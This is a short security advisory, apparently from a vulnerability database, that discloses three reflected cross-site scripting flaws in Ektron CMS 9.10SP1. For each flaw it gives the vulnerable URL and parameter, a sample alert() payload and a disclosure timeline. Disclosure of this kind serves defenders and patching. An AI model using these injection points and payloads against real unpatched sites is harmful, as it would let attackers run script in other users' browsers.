Ektron CMS 9.10SP1 Cross Site Scripting

2017.06.20
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Vulnerability type: Cross Site Scripting # Vendor: Ektron # Product: Ektron Content Management System # Affected version: 9.10SP1(Build 9.1.0.184) # Patched version: 9.1.0.184SP3(9.1.0.184.3.127) # Credit: Siyavash Ghasseminia, Edmund Goh # CVE ID: CVE-2016-6133 # PROOF OF CONCEPT Vulnerable URL: /WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033 # VULNERABLE PARAMETERS: - folder_id # SAMPLE PAYLOAD - ',1);});alert(1);// Or - <script>alert(1)</script> # TIMELINE - 1/7/2016: Vulnerability found - 4/7/2016: Vendor informed - 13/7/2016: Vendor responded and acknowledged - 29/7/2016: Vendor fixed the issue - 19/6/2017: Public disclosure ================================================================= # Vulnerability type: Cross Site Scripting # Vendor: Ektron # Product: Ektron Content Management System # Affected version: 9.10SP1(Build 9.1.0.184) # Patched version: 9.1.0.184SP3(9.1.0.184.3.127) # Credit: Siyavash Ghasseminia # CVE ID: CVE-2016-6133 # PROOF OF CONCEPT Vulnerable URL: /WorkArea/SelectUserGroup.aspx?action=Report&rptStatus # VULNERABLE PARAMETERS: - rptStatus # SAMPLE PAYLOAD - </script><script>alert(0x0004EA)</script> # TIMELINE - 1/7/2016: Vulnerability found - 4/7/2016: Vendor informed - 13/7/2016: Vendor responded and acknowledged - 29/7/2016: Vendor fixed the issue - 19/6/2017: Public disclosure ================================================================= # Vulnerability type: Cross Site Scripting # Vendor: Ektron # Product: Ektron Content Management System # Affected version: 9.10SP1(Build 9.1.0.184) # Patched version: 9.1.0.184SP3(9.1.0.184.3.127) # Credit: Siyavash Ghasseminia # CVE ID: CVE-2016-6201 # PROOF OF CONCEPT Vulnerable URL: /WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0 # VULNERABLE PARAMETERS: - ContType # SAMPLE PAYLOAD - %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp # TIMELINE - 1/7/2016: Vulnerability found - 4/7/2016: Vendor informed - 13/7/2016: Vendor responded and acknowledged - 29/7/2016: Vendor fixed the issue - 19/6/2017: Public disclosure


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top